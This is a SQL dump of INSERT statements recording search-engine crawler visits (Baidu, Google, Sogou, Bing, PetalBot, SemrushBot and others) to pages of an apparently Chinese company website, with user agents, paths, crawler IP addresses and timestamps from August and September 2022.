INSERT INTO `ey_weapp_spider_visit` VALUES ('96351', '2', 'mozilla/5.0 (compatible; baiduspider/2.0;+http://www.baidu.com/search/spider.html)', '/about/', '36.133.40.17', '1661268134', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95858', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_57/', '116.179.32.206', '1661061414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95842', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1661054336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95852', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.140', '1661058600', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96350', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/5.html', '220.181.108.111', '1661267428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96344', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/201.html', '114.119.151.153', '1661263389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96332', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.112', '1661255267', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95862', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/417.html', '114.119.151.155', '1661063229', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95864', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jbzxw/', '114.119.151.155', '1661063745', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95865', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/list_4_5/', '114.119.151.155', '1661064099', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95880', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_4/', '116.179.32.28', '1661071234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95885', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_15.html', '116.179.32.45', '1661073019', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96323', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/411.html', '185.191.171.24', '1661252306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95884', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_42/', '185.191.171.14', '1661072558', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96325', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/198.html', '157.55.39.117', '1661252913', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96326', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_4.html', '185.191.171.43', '1661253594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95883', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_3/', '220.181.108.102', '1661072127', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96316', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/28.html', '220.181.108.177', '1661251150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96317', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_5.html', '185.191.171.5', '1661252114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96318', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661252141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95882', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/266.html', '66.249.79.112', '1661071963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95889', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20_2.html', '116.179.32.32', '1661074804', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95887', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/140.html', '66.249.79.108', '1661073548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95890', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/118.html', '220.181.108.145', '1661075697', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95920', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.112', '1661095054', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95893', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_5.html', '185.191.171.25', '1661077025', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95901', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/115.html', '185.191.171.15', '1661079409', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95897', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/470.html', '66.249.79.108', '1661077967', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95898', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_3.html', '116.179.32.49', '1661078373', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95900', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/160.html', '220.181.108.166', '1661079266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95967', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.86', '1661120018', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95936', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/gqal/', '185.191.171.18', '1661104050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96301', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.104', '1661245039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96053', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/220.html', '66.249.79.110', '1661163526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96052', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/czs.html', '114.119.151.153', '1661163327', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96060', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jzs.html', '114.119.151.155', '1661165339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96050', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_43/', '185.191.171.34', '1661161518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96043', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '42.194.242.213', '1661157335', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96029', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/114.html', '116.179.32.33', '1661153728', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96025', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/218.html', '58.250.125.78', '1661149933', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96024', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hss.html', '114.119.151.153', '1661149207', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96026', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661150367', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96027', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/118.html', '66.249.79.112', '1661151841', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96022', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/229.html', '118.184.177.24', '1661148980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96021', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wulumuqi.html', '114.119.151.153', '1661148838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96019', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/jiaruwomen/', '66.249.79.112', '1661147389', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96034', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/434.html', '185.191.171.35', '1661154788', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96035', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ganshusheng.html', '114.119.151.155', '1661155169', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96048', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_5/', '114.119.151.155', '1661161174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96059', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/128.html', '114.119.151.153', '1661165158', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96057', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shanghai.html', '114.119.151.155', '1661163891', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96072', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/223.html', '49.7.20.138', '1661171830', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96055', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/23_3.html', '185.191.171.18', '1661163715', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96300', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/488.html', '116.179.32.12', '1661244630', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96056', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/227.html', '114.119.151.153', '1661163754', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96299', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/488.html', '220.181.108.145', '1661244216', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96073', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/68.html', '185.191.171.9', '1661172951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96065', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_14.html', '185.191.171.5', '1661168879', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96066', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/271.html', '185.191.171.19', '1661169082', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96068', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/92.html', '116.179.32.69', '1661170092', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96085', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/210.html', '114.119.151.155', '1661178941', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96081', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/69.html', '185.191.171.11', '1661177333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96092', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/280.html', '220.181.108.155', '1661182649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96121', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/224.html', '123.183.224.24', '1661195887', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96146', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/201.html', '216.244.66.194', '1661205245', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96155', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20.html', '220.181.108.146', '1661211466', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96216', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/324.html', '162.55.86.60', '1661218364', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96206', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/406.html', '162.55.86.60', '1661218302', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96204', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/392.html', '162.55.86.60', '1661218286', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96209', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/472.html', '162.55.86.60', '1661218315', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96577', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/44_4.html', '185.191.171.43', '1661370240', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96239', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.44', '1661221069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96562', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/116.html', '185.191.171.40', '1661363750', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96258', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/gqal/list_87_2/', '185.191.171.3', '1661229989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96257', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_42/', '185.191.171.22', '1661229590', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96284', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.113', '1661240923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96282', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/429.html', '116.179.32.46', '1661240921', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96492', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/153.html', '114.119.151.153', '1661332671', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97236', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/466.html', '207.46.13.213', '1661643210', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97257', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1661652355', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96485', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/93.html', '216.244.66.194', '1661330715', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96474', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_39/', '66.249.79.110', '1661326756', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96486', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/10.html', '185.191.171.38', '1661330878', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96473', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/170.html', '185.191.171.17', '1661324164', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96511', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/198.html', '185.191.171.22', '1661339541', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96352', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/317.html', '185.191.171.25', '1661268449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98964', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/129.html', '216.244.66.194', '1662455130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98983', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gongsijianjie/', '162.55.86.60', '1662457262', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98968', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/405.html', '185.191.171.25', '1662457203', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98971', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcwd/', '162.55.86.60', '1662457222', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98979', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/', '162.55.86.60', '1662457250', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98973', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/', '162.55.86.60', '1662457228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98975', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/blj/', '162.55.86.60', '1662457237', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98974', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bengche/', '162.55.86.60', '1662457232', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98976', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljwd/', '162.55.86.60', '1662457240', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98991', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/266.html', '162.55.86.60', '1662457288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98992', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/280.html', '162.55.86.60', '1662457291', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99002', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/384.html', '162.55.86.60', '1662457323', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98999', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/375.html', '162.55.86.60', '1662457315', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99000', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/377.html', '162.55.86.60', '1662457318', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99016', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/324.html', '162.55.86.60', '1662457388', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99019', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/331.html', '162.55.86.60', '1662457405', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99038', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bljxw/', '66.249.79.108', '1662457795', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99017', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/327.html', '162.55.86.60', '1662457393', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99030', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/347.html', '114.119.151.151', '1662457476', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99035', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/yqal/', '162.55.86.60', '1662457504', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99036', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1662457762', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99040', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/371.html', '66.249.79.108', '1662457797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99041', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/384.html', '66.249.79.108', '1662457798', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99042', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/384.html', '66.249.79.112', '1662460918', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99055', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/gongsijianjie/', '116.179.32.93', '1662471868', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99057', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/351.html', '116.179.32.66', '1662473653', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99043', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/120.html', '185.191.171.25', '1662463595', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99109', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/234.html', '162.55.86.60', '1662487550', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99046', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_7.html', '185.191.171.5', '1662465638', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99044', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1662464039', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99054', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/142.html', '185.191.171.14', '1662471407', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99051', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/67.html', '220.181.108.83', '1662469011', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99065', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/266.html', '116.179.32.137', '1662477225', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95352', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660767483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95289', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_35.html', '220.181.108.102', '1660728627', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95290', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/485.html', '185.191.171.41', '1660729101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99075', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.108', '1662480089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99082', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/', '17.121.114.212', '1662483141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95288', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/263.html', '114.119.151.155', '1660728614', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95458', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/239.html', '185.191.171.25', '1660831656', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99077', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/20.html', '220.181.108.82', '1662480795', '0');
